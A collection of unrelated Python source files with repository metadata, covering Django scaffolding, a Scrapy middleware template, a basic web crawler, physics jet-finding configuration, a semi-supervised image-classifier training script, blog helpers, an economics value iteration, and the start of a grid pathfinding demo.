# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models import sorl.thumbnail.fields class Migration(migrations.Migration): dependencies = [ ('images', '0001_initial'), ] operations = [ migrations.AlterField( model_name='image', name='image', field=sorl.thumbnail.fields.ImageField(max_length=512, upload_to=b'images'), ), ]
4e3abde77ccd1556174380fea5d10c4c9f3c49b9
377bc20bb72234f0095eedba83ddbfaad79c50bb
/djangoTest/djangoTest/settings.py
35a217a1c587772eb74bf7e55e6eda3b1be1b868
[]
no_license
choicoding1026/Django
56fcf9932095829b26037ab5c506882ea31f7f33
4bbdf0e0f79175e10f8f75a29c2bc8f0ebd5328c
refs/heads/master
2022-12-19T20:07:22.904082
2020-09-28T08:46:58
2020-09-28T08:46:58
298,218,997
0
0
null
null
null
null
UTF-8
Python
false
false
3,074
py
""" Django settings for djangoTest project. Generated by 'django-admin startproject' using Django 3.1.1. For more information on this file, see https://docs.djangoproject.com/en/3.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.1/ref/settings/ """ from pathlib import Path # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '@r+wqv+3!z+6=k-1csw@7(2(vxwx(6o$#w4hbox-m@@r*xn48p' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'djangoTest.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'djangoTest.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATIC_URL = '/static/'
3d1e5f29bcb35d357062cc9fc390560ac7aff133
9cef1e851750e9ab31909eae57415c00c7f2428b
/scrapers/beef_supply_chain_para/middlewares.py
35d64f08fb9421314217476361bf18fca78b96ec
[ "MIT" ]
permissive
StellaCarneiro/beef-supply-chain
9fb39c4beaf55b9ae9a9204b22a569533fb7c7c6
bd2f994e1515a5c8fc3e3794e936c4d3e246453e
refs/heads/main
2023-01-21T10:17:03.915123
2020-12-02T18:30:12
2020-12-02T18:30:12
342,729,078
1
0
null
2021-02-26T23:45:55
2021-02-26T23:45:55
null
UTF-8
Python
false
false
3,623
py
# -*- coding: utf-8 -*- # Define here the models for your spider middleware # # See documentation in: # https://doc.scrapy.org/en/latest/topics/spider-middleware.html from scrapy import signals class BeefSupplyChainParaSpiderMiddleware(object): # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the spider middleware does not modify the # passed objects. @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_spider_input(self, response, spider): # Called for each response that goes through the spider # middleware and into the spider. # Should return None or raise an exception. return None def process_spider_output(self, response, result, spider): # Called with the results returned from the Spider, after # it has processed the response. # Must return an iterable of Request, dict or Item objects. for i in result: yield i def process_spider_exception(self, response, exception, spider): # Called when a spider or process_spider_input() method # (from other spider middleware) raises an exception. # Should return either None or an iterable of Response, dict # or Item objects. pass def process_start_requests(self, start_requests, spider): # Called with the start requests of the spider, and works # similarly to the process_spider_output() method, except # that it doesn’t have a response associated. # Must return only requests (not items). for r in start_requests: yield r def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name) class BeefSupplyChainParaDownloaderMiddleware(object): # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the downloader middleware does not modify the # passed objects. @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_request(self, request, spider): # Called for each request that goes through the downloader # middleware. # Must either: # - return None: continue processing this request # - or return a Response object # - or return a Request object # - or raise IgnoreRequest: process_exception() methods of # installed downloader middleware will be called return None def process_response(self, request, response, spider): # Called with the response returned from the downloader. # Must either; # - return a Response object # - return a Request object # - or raise IgnoreRequest return response def process_exception(self, request, exception, spider): # Called when a download handler or a process_request() # (from other downloader middleware) raises an exception. # Must either: # - return None: continue processing this exception # - return a Response object: stops process_exception() chain # - return a Request object: stops process_exception() chain pass def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name)
60f3142dd05ea30e240de63fe4ee9b0fda5999cf
53fab060fa262e5d5026e0807d93c75fb81e67b9
/backup/user_395/ch32_2019_03_26_16_46_20_229168.py
53939c1ffa07971a583c887f865be3d4e5c189df
[]
no_license
gabriellaec/desoft-analise-exercicios
b77c6999424c5ce7e44086a12589a0ad43d6adca
01940ab0897aa6005764fc220b900e4d6161d36b
refs/heads/main
2023-01-31T17:19:42.050628
2020-12-16T05:21:31
2020-12-16T05:21:31
306,735,108
0
0
null
null
null
null
UTF-8
Python
false
false
223
py
a = str(input('Você tem dúvidas?')) while a != 'não': if a == 'nao': print ('Até a próxima') elif a != 'não': print ('Pratique mais') a = str(input('Você tem dúvidas?')) break
54d82f06835c62981d7b87da84e06bc382fa3711
a9d96371f00c25e8b4ec73aebae3bf093f1fbcab
/src/crawl_web_maxpages.py
00d4aad0e39c088c0fea3f2ac14bc87868358a27
[]
no_license
joskid/SearchEngine
9c06a3da9d0b97e33519637c5379ff7036411a42
9ba8b11e48c6614b2f59e7f2b9b50483022ac4a2
refs/heads/master
2021-01-18T05:39:22.119963
2012-03-27T07:27:09
2012-03-27T07:27:09
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,549
py
# crawling the web starting from seed page with max_pages parameter # get_page() procedure for getting the contents os webpage as a string import urllib def get_page(url): try: return urllib.urlopen(url).read() except: return "" # procedure for finding and returning the next url from the passing page parameter def get_next_target(page): start_link = page.find('<a href=') if start_link == -1: return None, 0 start_quote = page.find('"', start_link) end_quote = page.find('"', start_quote + 1) url = page[start_quote + 1:end_quote] return url, end_quote # procedure for finding the union of two lists def union(p,q): for e in q: if e not in p: p.append(e) return p # given a seed page, it will return all the links in that page def get_all_links(page): links = [] while True: url,endpos = get_next_target(page) if url: links.append(url) page = page[endpos:] else: break return links # for crawling the web, constrained on the maximum different pages crawled def crawl_web(seed,max_pages): tocrawl = [seed] crawled = [] while tocrawl: page = tocrawl.pop() if len(crawled) < max_pages : if page not in crawled: union(tocrawl, get_all_links(get_page(page))) crawled.append(page) return crawled # Running the program with given seed pages and max_pages print crawl_web("http://xkcd.com/353",10)
d274a8a644daff6fd4c2f4db5f2fb2745f1e937a
b22588340d7925b614a735bbbde1b351ad657ffc
/athena/PhysicsAnalysis/D3PDMaker/JetTagD3PDMaker/share/JetTagD3PD_makeTrackJets.py
49e467360ee52960c521a147637e239d6091e488
[]
no_license
rushioda/PIXELVALID_athena
90befe12042c1249cbb3655dde1428bb9b9a42ce
22df23187ef85e9c3120122c8375ea0e7d8ea440
refs/heads/master
2020-12-14T22:01:15.365949
2020-01-19T03:59:35
2020-01-19T03:59:35
234,836,993
1
0
null
null
null
null
UTF-8
Python
false
false
3,779
py
from JetRecTools.JetRecToolsConf import JetTrackZClusterTool from JetRec.JetRecConf import JetFastJetFinderTool from JetRec.JetRecFlags import jetFlags from JetRec.JetGetters import * #------------------------------------------------------------------------ # Setup tool so that it can be used #------------------------------------------------------------------------ JetTrackZClusterTool_Z4 = JetTrackZClusterTool( "JetTrackZClusterTool_Z4" ) JetTrackZClusterTool_Z4.TrackJetMinMulti = 2 JetTrackZClusterTool_Z4.TrackJetMinPt = 5000 # MeV JetTrackZClusterTool_Z4.UseVtxSeeding = True JetTrackZClusterTool_Z4.DeltaZRange = 10000.0 JetTrackZClusterTool_Z4.TrackParticleContainerName = "TrackParticleCandidate" JetTrackZClusterTool_Z4.VxContainerName = "VxPrimaryCandidate" JetTrackZClusterTool_Z4.OutputLevel = INFO #-------------------------------------------------------------- from InDetTrackSelectorTool.InDetTrackSelectorToolConf import InDet__InDetDetailedTrackSelectorTool #-------------------------------------------------------------- ToolSvc += InDet__InDetDetailedTrackSelectorTool( "InDetDetailedTrackSelectorTool_Z4") ToolSvc.InDetDetailedTrackSelectorTool_Z4.pTMin = 500 # MeV ToolSvc.InDetDetailedTrackSelectorTool_Z4.etaMax = 2.5 ToolSvc.InDetDetailedTrackSelectorTool_Z4.nHitBLayer = 0 ToolSvc.InDetDetailedTrackSelectorTool_Z4.nHitPix = 1 ToolSvc.InDetDetailedTrackSelectorTool_Z4.nHitSct = 6 ToolSvc.InDetDetailedTrackSelectorTool_Z4.nHitSi = 7 #7 ToolSvc.InDetDetailedTrackSelectorTool_Z4.nHitTrt = 0 ToolSvc.InDetDetailedTrackSelectorTool_Z4.IPd0Max = 1.5 # d0 cut ToolSvc.InDetDetailedTrackSelectorTool_Z4.IPz0Max = 1.5 # z0*sin(theta) cut ToolSvc.InDetDetailedTrackSelectorTool_Z4.z0Max = 200 # z0 cut ToolSvc.InDetDetailedTrackSelectorTool_Z4.fitChi2OnNdfMax = 10000 #3.5 ToolSvc.InDetDetailedTrackSelectorTool_Z4.d0significanceMax = -1. ToolSvc.InDetDetailedTrackSelectorTool_Z4.z0significanceMax = -1. ToolSvc.InDetDetailedTrackSelectorTool_Z4.OutputLevel = INFO JetTrackZClusterTool_Z4.TrackSelector = ToolSvc.InDetDetailedTrackSelectorTool_Z4 # 2 tracks threshold at 500MeV ToolSvc.InDetDetailedTrackSelectorTool_Z4.TrackSummaryTool = InDetTrackSummaryTool ToolSvc.InDetDetailedTrackSelectorTool_Z4.Extrapolator = InDetExtrapolator #-------------------------------------------------------------- #-------------------------------------------------------------- JetFastJetFinderToolAntiKt_Z4 = JetFastJetFinderTool("JetFastJetFinderToolAntiKt_Z4") JetFastJetFinderToolAntiKt_Z4.Algorithm = "anti-kt" JetFastJetFinderToolAntiKt_Z4.Radius = 0.4 JetFastJetFinderToolAntiKt_Z4.RecombScheme = "E" JetFastJetFinderToolAntiKt_Z4.Strategy = "Best" JetFastJetFinderToolAntiKt_Z4.FailIfMisconfigured = True JetFastJetFinderToolAntiKt_Z4.Inclusive = True JetFastJetFinderToolAntiKt_Z4.CalculateJetArea = False JetFastJetFinderToolAntiKt_Z4.StoreNFlipValues = 2 ToolSvc += JetFastJetFinderToolAntiKt_Z4 JetTrackZClusterTool_Z4.JetFinder = JetFastJetFinderToolAntiKt_Z4 #BTagToolList = [ JetTrackZClusterTool_Z4, JetSorterTool() ] #BTagToolList += getStandardBTaggerTool('AntiKtZ',0.4,'Track') #-------------------------------------------------------------- my_att_dict = dict(jet_attribute_dict) # Fill the attribute dictionary my_att_dict['_finderType'] = 'AntiKtZ' my_att_dict['_finderParams'] = [0.4] my_att_dict['_inputType'] = 'Track' my_att_dict['_inputColl'] = [] #jetRec_Z4 = make_customJetGetter(my_att_dict, BTagToolList).jetAlgorithmHandle() jetRec_Z4 = make_customJetGetter(my_att_dict, [JetTrackZClusterTool_Z4,JetSorterTool()]).jetAlgorithmHandle()
4b084dd7ab6265d719d52f462ded8f95839f050b
2d5c00af71c58e02bbf7089c9cdeea42a5e1475a
/train_phase2_classifier.py
b1a3108a24d0b27131b0b839648b1bdbc1f60c08
[ "MIT" ]
permissive
sohag-mbstu-ict/robust_frcnn
87fc446fac7b137b183db2b0dfb64d043dbab174
707ea9a3063d40fbfd9894bf4561025357fcb0ef
refs/heads/master
2023-03-16T11:31:52.214790
2020-07-19T19:47:18
2020-07-19T19:47:18
null
0
0
null
null
null
null
UTF-8
Python
false
false
11,792
py
from __future__ import division import random import pprint import sys import time import numpy as np from keras.layers import Dense, GlobalAveragePooling2D, Dropout, Input from keras.models import Model, model_from_json from keras.applications.inception_v3 import InceptionV3 from keras import backend as K from keras.optimizers import RMSprop, Adam, SGD from keras.callbacks import LearningRateScheduler from keras.utils import generic_utils from keras_frcnn import phase3_utils from optparse import OptionParser import os import pickle from sklearn.metrics import f1_score # Import image generator functions from keras_frcnn import phase2_generator if 'tensorflow' == K.backend(): import tensorflow as tf from keras.backend.tensorflow_backend import set_session config2 = tf.ConfigProto() config2.gpu_options.allow_growth = True set_session(tf.Session(config=config2)) sys.setrecursionlimit(40000) def kl_div(P, Q): return np.nansum([p * np.log2(p / (q + 1e-8)) for p, q in zip(P, Q) if p != 0]) def js_distance(P, Q): M = 0.5 * (P + Q) return np.sqrt(0.5 * kl_div(P, M) + 0.5 * kl_div(Q, M)) def get_optimal_alpha(p_img, p_curr, rule_mode = "max"): js_dist_list = [js_distance(p_img[0,i,:], p_curr[0,i,:]) for i in range(p_img.shape[1])] if rule_mode == "max": dist_diff = np.nanmax(js_dist_list) elif rule_mode == "min": dist_diff = np.nanmin(js_dist_list) else: dist_diff = np.nanmean(js_dist_list) return np.max([alpha_final, dist_diff / (1 - dist_diff + 1e-8)]) def make_target_probas(p_img, p_curr, alpha, constrain_hard_examples = False): target_probas = (np.log(p_curr[0] + 1e-8) + alpha * np.log(p_img[0] + 1e-8)) / (1 + alpha) target_probas = np.exp(target_probas) / np.exp(target_probas).sum(axis = 1)[:, None] idx = [] if constrain_hard_examples: # Confident predictions in img_classifier idx_conf = np.where(p_img[0] >= 0.90) target_probas[idx_conf[0], :] = 0 target_probas[idx_conf] = 1 # Easy predictions (agreement between img and current) idx_agree = np.where((p_img[0].argmax(1) == p_curr[0].argmax(1)) & (p_curr[0].max(1) >= 0.50))[0] cols_agree = p_curr[0].argmax(1)[idx_agree] target_probas[idx_agree,:] = 0 target_probas[idx_agree, cols_agree] = 1 idx = np.unique(idx_conf[0].tolist() + idx_agree.tolist()).tolist() return np.expand_dims(target_probas, axis = 0), idx parser = OptionParser() parser.add_option("-s", "--source_path", dest="source_path", help="Path to the source txt file.") parser.add_option("-t", "--target_path", dest="target_path", help="Path to the target detections txt file.") parser.add_option("-o", "--original_detector_path", dest="original_detector_path", help="Path to the txt file used in phase 1.") parser.add_option("-d", "--save_dir", dest="save_dir", help="Path to directory where architecture and weights will be saved.", default="models/phase2") parser.add_option("-a", "--model_architecture", dest="model_architecture", help="Path to JSON where architecture will be saved (inside save_dir).", default="phase2_model.json") parser.add_option("-w", "--model_weights", dest="model_weights", help="Path to .hdf5 where weights will be saved (inside save_dir).", default="phase2_weights.hdf5") parser.add_option("-e", "--num_epochs", dest="num_epochs", help="Number of epochs for the training.", default=1, type=int) parser.add_option("--e_length", dest="e_length", help="Epoch length - Steps for each epoch.", default=1000, type=int) parser.add_option("--config_filename", dest="config_filename", help="Path of the config file of phase 1 F-RCNN.", default="config.pickle") parser.add_option("-r", "--reg_param", dest="reg_param", help="Regularization parameter for semi-supervised training.", default=0.2, type=float) parser.add_option("--sup_lr", dest="sup_lr", help="Learning rate used for the supervised training.", default=1e-5, type=float) parser.add_option("--val_size", dest="val_size", help="Nb of images to use as val set to monitor performance and save weights (default 100).", default=100, type=int) parser.add_option("-m", "--model_type", dest="model_type", help="Model to be used. 1: Noisy labels (default) 2: Entropy-minimization.", default=1, type=int) parser.add_option("--alpha_init", type=float, dest="alpha_init", help="Starting alpha value for noisy-label model.", default=100.) parser.add_option("--alpha_final", type=float, dest="alpha_final", help="Final/smallest alpha value for noisy-label model.", default=0.5) parser.add_option("--hard_constraints", dest="hard_constraints", help="Set hard thresholds on confident predictions", action="store_true", default=False) parser.add_option("--recompute_alpha", dest="recompute_alpha", help="Recompute alpha automatically using Hausdorf distance.", action="store_true", default=False) (options, args) = parser.parse_args() if not options.source_path: # if filename is not given parser.error('Error: path to source dataset must be specified. Pass --source_path to command line') if not options.target_path: parser.error('Error: path to target detections dataset must be specified. Pass --target_path to command line') if not os.path.isdir(options.save_dir): os.mkdir(options.save_dir) with open(options.config_filename, 'rb') as f_in: C = pickle.load(f_in) # Check the correct ordering if K.image_dim_ordering() == 'th': input_shape_img = (3, None, None) else: input_shape_img = (None, None, 3) # Define the number of classes - Background is included n_classes = len(C.class_mapping) print("Number of classes (used for phase 1) = {}".format(n_classes)) print("========== Creating architectures ==========") base_cnn = InceptionV3(include_top = False, weights = 'imagenet', input_shape = input_shape_img) x = base_cnn.output x = GlobalAveragePooling2D(name = "final_globalavgpooling")(x) x = Dense(4096, activation = 'relu', name = "final_dense1")(x) x = Dropout(0.5)(x) x = Dense(2048, activation = 'relu', name = "final_dense2")(x) x = Dropout(0.5)(x) x = Dense(1024, activation = 'relu', name = "final_dense3")(x) x = Dropout(0.5)(x) x = Dense(n_classes, activation = "softmax", name = "predictions")(x) sup_img_classifier = Model(inputs = base_cnn.input, outputs = x) if options.model_type == 2: semi_img_classifier = Model(inputs = base_cnn.input, outputs = x) reg_param = options.reg_param def semi_loss(y_true, y_pred): y_pred = y_pred + 1e-8 return - reg_param * K.mean(y_pred * K.log(y_pred)) semi_sup_lr_ratio = 5 supervised_lr = options.sup_lr semi_lr = supervised_lr / semi_sup_lr_ratio optimizer_sup = Adam(lr = supervised_lr, clipnorm = 1e-2) optimizer_semi = Adam(lr = semi_lr, clipnorm = 1e-4) #optimizer_sup = RMSprop(supervised_lr) #optimizer_semi = RMSprop(semi_lr) #optimizer_sup = SGD(lr = supervised_lr, clipnorm = 1e-3, nesterov = False) #optimizer_semi = SGD(lr = semi_lr, clipnorm = 1e-3, nesterov = False) sup_img_classifier.compile(optimizer = optimizer_sup, loss = "categorical_crossentropy") if options.model_type == 2: semi_img_classifier.compile(optimizer = optimizer_semi, loss = semi_loss) # Saving the model architecture with open(os.path.join(options.save_dir, options.model_architecture), "w") as f: f.write(sup_img_classifier.to_json()) f.close() print("========== Created and saved architectures ========") # We create the training generators data_gen_source = phase2_generator.image_generator(options.source_path, C, mode = "source") data_gen_original = phase2_generator.image_generator(options.original_detector_path, C, mode = "source") data_gen_target = phase2_generator.image_generator(options.target_path, C, mode = "target") sup_loss = np.zeros(options.e_length) semi_loss = np.zeros(options.e_length) n_epochs = options.num_epochs start_time = time.time() best_acc = -np.Inf batch_size = 32 # Making the validation set to measure improvement val_size = options.val_size x_test, y_test = next(data_gen_source) y_true = [y_test.argmax()] for i in range(1, val_size): if i % 2 == 0: x_next, y_test = next(data_gen_original) else: x_next, y_test = next(data_gen_source) x_test = np.concatenate((x_test, x_next), axis = 0) y_true.append(y_test.argmax()) sup_loss_hist = [] semi_loss_hist = [] time_hist = [] f1_loss_hist = [] alpha_init = float(options.alpha_init) alpha_final = float(options.alpha_final) constant_thresh = int(5 / 7 * options.e_length * n_epochs) print("========== Starting training ============") # Begin the training for epoch in range(n_epochs): progbar = generic_utils.Progbar(options.e_length) print('Epoch {}/{}'.format(epoch + 1, n_epochs)) iter_num = 0 if epoch > 0 and epoch % 3 == 0: supervised_lr = supervised_lr * 0.1 #semi_lr = semi_lr * 0.94 K.set_value(sup_img_classifier.optimizer.lr, supervised_lr) #K.set_value(semi_img_classifier.optimizer.lr, semi_lr) while True: try: if iter_num <= constant_thresh: alpha = alpha_init - iter_num * (alpha_init - alpha_final) / constant_thresh X_source, Y_source = next(data_gen_source) X_target, Y_target = next(data_gen_target) for b in range(1, batch_size): if b % 3 == 0: x_next, y_next = next(data_gen_original) else: x_next, y_next = next(data_gen_source) X_source, Y_source = np.concatenate((X_source, x_next), axis = 0), np.concatenate((Y_source, y_next), axis = 0) x_next, y_next = next(data_gen_target) X_target = np.concatenate((X_target, x_next), axis = 0) if options.model_type == 1: Y_target = np.concatenate((Y_target, y_next), axis = 0) # Run one supervised step sup_loss[iter_num] = sup_img_classifier.train_on_batch(X_source, Y_source) # Run one semi-supervised step if options.model_type == 2: semi_loss[iter_num] = semi_img_classifier.train_on_batch(X_target, Y_source) # We pass Y_source because of Keras, but it's not used else: curr_probas = np.expand_dims(sup_img_classifier.predict(X_target), axis = 0) Y_target = np.expand_dims(Y_target, axis = 0) if options.recompute_alpha: alpha = get_optimal_alpha(Y_target, curr_probas, "max") Y_target, _ = make_target_probas(Y_target, curr_probas, alpha, constrain_hard_examples = options.hard_constraints) semi_loss[iter_num] = sup_img_classifier.train_on_batch(X_target, Y_target[0]) progbar.update(iter_num, [('Supervised Loss', sup_loss[iter_num].mean()), ('Semi-Sup Loss', semi_loss[iter_num].mean()), ("Total Loss", (sup_loss[iter_num] + semi_loss[iter_num]).mean())]) iter_num += 1 if iter_num == options.e_length: y_pred = sup_img_classifier.predict_on_batch(x_test).argmax(1).tolist() curr_acc = f1_score(y_true, y_pred, average = "micro") semi_loss_hist.extend(semi_loss.tolist()) sup_loss_hist.extend(sup_loss.tolist()) time_hist.append(time.time() - start_time) f1_loss_hist.append(curr_acc) if C.verbose: print('\nSupervised Loss: {}'.format(sup_loss.mean())) print('Semi-Supervised Loss {}'.format(semi_loss.mean())) print('Total Loss: {}'.format(np.nanmean(sup_loss + semi_loss))) print("Current F1-Score: {}".format(curr_acc)) print('Elapsed time: {}'.format(time.time() - start_time)) if curr_acc > best_acc: if C.verbose: print('Total F1-Score increased from {} to {}, saving weights'.format(best_acc, curr_acc)) best_acc = curr_acc sup_img_classifier.save_weights(os.path.join(options.save_dir, options.model_weights)) start_time = time.time() break except Exception as e: print('Exception: {}'.format(e)) continue print("=========== Finished training =============") #np.savez("img_train_results.npz", sup_loss = sup_loss_hist, semi_loss = semi_loss_hist, time_hist = time_hist, f1_loss = f1_loss_hist, n_epochs = n_epochs, epoch_length = options.e_length)
2df13f8960a8c0c01b41d33c85d81572f3b29fd3
228ca0372abc0d46b4667208049b1264429d63c0
/src/weather.py
ef8a919bc4fc4e0aaa0cee235341344a15fe95b1
[]
no_license
showmurai/tenki
eaea50ef1ab7ffbacdb8418d30e0601b70db1336
b1cdf94bf1d3f6d6d0244a3d43e150cf0af934b8
refs/heads/master
2020-04-06T06:40:45.442280
2014-06-05T06:17:58
2014-06-05T06:17:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
255
py
# -*- coding:utf-8 -*- import requests import json r = requests.get('http://api.openweathermap.org/data/2.5/weather?q=Tokyo,jp', ) print r.status_code print r.headers['content-type'] print r.json() encode_json = json.dumps(r.json()) print encode_json
55c4d1d2f2cd01306eadfd5c6b8b1f255b2d2838
499329b1a7c5691c8a20a24dccd04b5685cd566a
/bambu/blog/helpers.py
dad9bd81c11d66a2f049b62c8e566d160fb38eb6
[]
no_license
flamingtarball/bambu-tools
dd00d382d04457d988a33022b97ef54b3f3023dc
ca0e8e7f3cbbb946e39f8df794ec82baf34795de
refs/heads/master
2016-09-05T23:37:35.906125
2012-08-14T10:16:31
2012-08-14T10:16:31
5,181,076
1
0
null
null
null
null
UTF-8
Python
false
false
2,143
py
from django.contrib.auth.models import User from django.utils.timezone import utc from taggit.models import Tag from datetime import datetime def view_filter(**kwargs): from bambu.blog.models import Post, Category posts = Post.objects.live() if 'year' in kwargs: posts = posts.filter( date__year = int(kwargs['year']) ) if 'month' in kwargs: posts = posts.filter( date__month = int(kwargs['month']) ) if 'day' in kwargs: posts = posts.filter( date__day = int(kwargs['day']) ) if 'category' in kwargs: posts = posts.filter(categories__slug = kwargs['category']) elif 'tag' in kwargs: posts = posts.filter(tags__slug = kwargs['tag']) elif 'username' in kwargs: posts = posts.filter(author__username = kwargs['username']) return posts def title_parts(**kwargs): from bambu.blog.models import Category title_parts = [u'Blog'] if 'year' in kwargs: if 'month' in kwargs: if 'day' in kwargs: title_parts.insert(0, datetime( int(kwargs['year']), int(kwargs['month']), int(kwargs['day']) ).replace(tzinfo = utc).strftime('%B %d, %Y') ) else: title_parts.insert(0, datetime( int(kwargs['year']), int(kwargs['month']), 1 ).replace(tzinfo = utc).strftime('%B %Y') ) else: title_parts.insert(0, kwargs['year']) if 'category' in kwargs: category = Category.objects.get(slug = kwargs['category']) title_parts.insert(0, category.name) elif 'tag' in kwargs: tag = Tag.objects.get(slug = kwargs['tag']) title_parts.insert(0, tag.name) elif 'username' in kwargs: author = User.objects.get(username = kwargs['username']) title_parts.insert(0, author.get_full_name() or author.username) return title_parts def get_post_image(post): image_types = ( 'image/bmp', 'image/x-windows-bmp', 'image/gif', 'image/jpeg', 'image/pjpeg', 'image/png' ) images = post.attachments.filter(mimetype__in = image_types)[:1] if images.count() > 0: try: url = images[0].file.url if url.startswith('/'): url = settings.MEDIA_URL[:-1] + url return url except: pass return ''
b2f2b0710c0640c57e4a6973c8d53859dfa230dc
f3c332093a573e5e407102f28126c97ec0bb94ce
/Math work trial 4.py
33d4d7dc24f5660b1edc869411ddf005876fa1c6
[]
no_license
AlexisMergan/Math
8decc9925c6b400b5962d34750a763f4a5a29ce3
2f4c4c458b1ac845e15fd3de673e7371c0bc736b
refs/heads/master
2021-03-08T00:46:40.093499
2020-03-18T19:55:40
2020-03-18T19:55:40
246,307,282
0
2
null
null
null
null
UTF-8
Python
false
false
1,133
py
import numpy as np import math #Parameter Values sigma=1.5 beta=0.95 alpha=0.3 delta=0.1 epsilon=10**(-3) K= np.linspace(0.01,5,1000) V= np.linspace(0,0,1000) def u(c): utility=((c**(1-sigma))-1)/(1-sigma) if c<=0:return -math.exp(200) else: return utility def ct(i, j, K): kt1 = K[i] kt2 = K[j] ct1=((kt1**alpha)+(1-delta)*kt1-kt2) return ct1 def funct1(i,j,K,V): cons = ct(i,j,K) if cons >=0: return u(cons)+ beta*V[i] else: return -math.exp(200) #print(funct1(2,0,K,V)) #print(funct1(500,0,K,V)) #print(funct1(999,0,K,V)) #print(funct1(999,400,K,V)) length=range(len(K)) def maxlist(i,K): values_i=[] for j in length: values_i.append(float(funct1(i,j,K,V))) return values_i #print(maxlist(2,K)) def funct2(i,K): v=max(maxlist(i,K)) return v #print(funct2(2,K)) #print(funct2(999,K)) #print(funct2(500,K)) dist = 100 while dist > epsilon: TV = [] diff = [] for i in length: TV.append(funct2(i,K)) diff.append(TV[i]-V[i]) dist=max(np.abs(diff)) V=TV print(dist) print(V)
e87450c7a8365fbcc7052eb6fab30bacef49d0a0
9fb9133e179a02e110b32513cd193903f4cb05cb
/T10 Graphs, Paths and Search/box_world.py
e5178cf8de73d6302373a88901e1d5c26a96de15
[]
no_license
DPerrySvendsen/COS30002
be7807d84cb252a78e781994b46a8794a11e81e3
27f60dff622cd6621c20cba5eeb8d01b246291f1
refs/heads/master
2021-01-23T16:29:59.103086
2017-06-04T08:41:24
2017-06-05T06:40:20
93,300,179
4
5
null
null
null
null
UTF-8
Python
false
false
15,157
py
''' Basic square grid based world (BoxWorld) to test/demo path planning. Created for HIT3046 AI for Games by Clinton Woodward [email protected] See readme.txt for details. Look for ### comment lines. Note that the box world "boxes" (tiles) are created and assigned an index (idx) value, starting from the origin in the bottom left corder. This matches the convention of coordinates used by pyglet which uses OpenGL, rather than a traditional 2D graphics with the origin in the top left corner. + ... ^ 5 6 7 8 9 | 0 1 2 3 4 (0,0) ---> + A BoxWorld can be loaded from a text file. The file uses the following format. * Values are separated by spaces or tabs (not commas) * Blank lines or lines starting with # (comments) are ignored * The first data line is two integer values to specify width and height * The second row specifies the Start and the Target boxes as index values. S 10 T 15 * Each BowWorld row is the specified per line of the text file. - Each type is specified by a single character ".", "~", "m" or "#". - Number of tile values must match the number of columns * The number of rows must match the number of specified rows. Example BoxWorld map file. # This is a comment and is ignored # First specify the width x height values 6 5 # Second specify the start and target box indexes 0 17 # Now specify each row of column values . . . . . . ~ ~ X . . . . ~ X ~ . . . . X . . . . m m m . . # Note the number of rows and column values match ''' from graphics import egi import pyglet from pyglet.gl import * from point2d import Point2D from graph import SparseGraph, Node, Edge from searches import SEARCHES from math import hypot box_kind = ['.','m','~','X'] box_kind_map = { 'clear': '.', 'mud': 'm', 'water': '~', 'wall': 'X', } no_edge = ['X'] # box kinds that don't have edges. edge_cost_matrix = [ # '.' 'm' '~' 'X' [ 1.0, 2.0, 5.0, None], # '.' [ 2.0, 4.0, 9.0, None], # 'm' [ 5.0, 9.0, 10.0, None], # '~' [None, None, None, None], # 'X <- NO edges to walls. ] min_edge_cost = 1.0 # must be min value for heuristic cost to work def edge_cost(k1, k2): k1 = box_kind.index(k1) k2 = box_kind.index(k2) return edge_cost_matrix[k1][k2] box_kind_color = { '.': (1.0, 1.0, 1.0, 1.0), # clear, White 'm': (0.6, 0.6, 0.5, 1.0), # mud, Brown-ish '~': (0.5, 0.5, 1.0, 1.0), # water, Light blue 'X': (0.2, 0.2, 0.2, 1.0), # walls, Dark grey } cfg = { 'LABELS_ON': False, 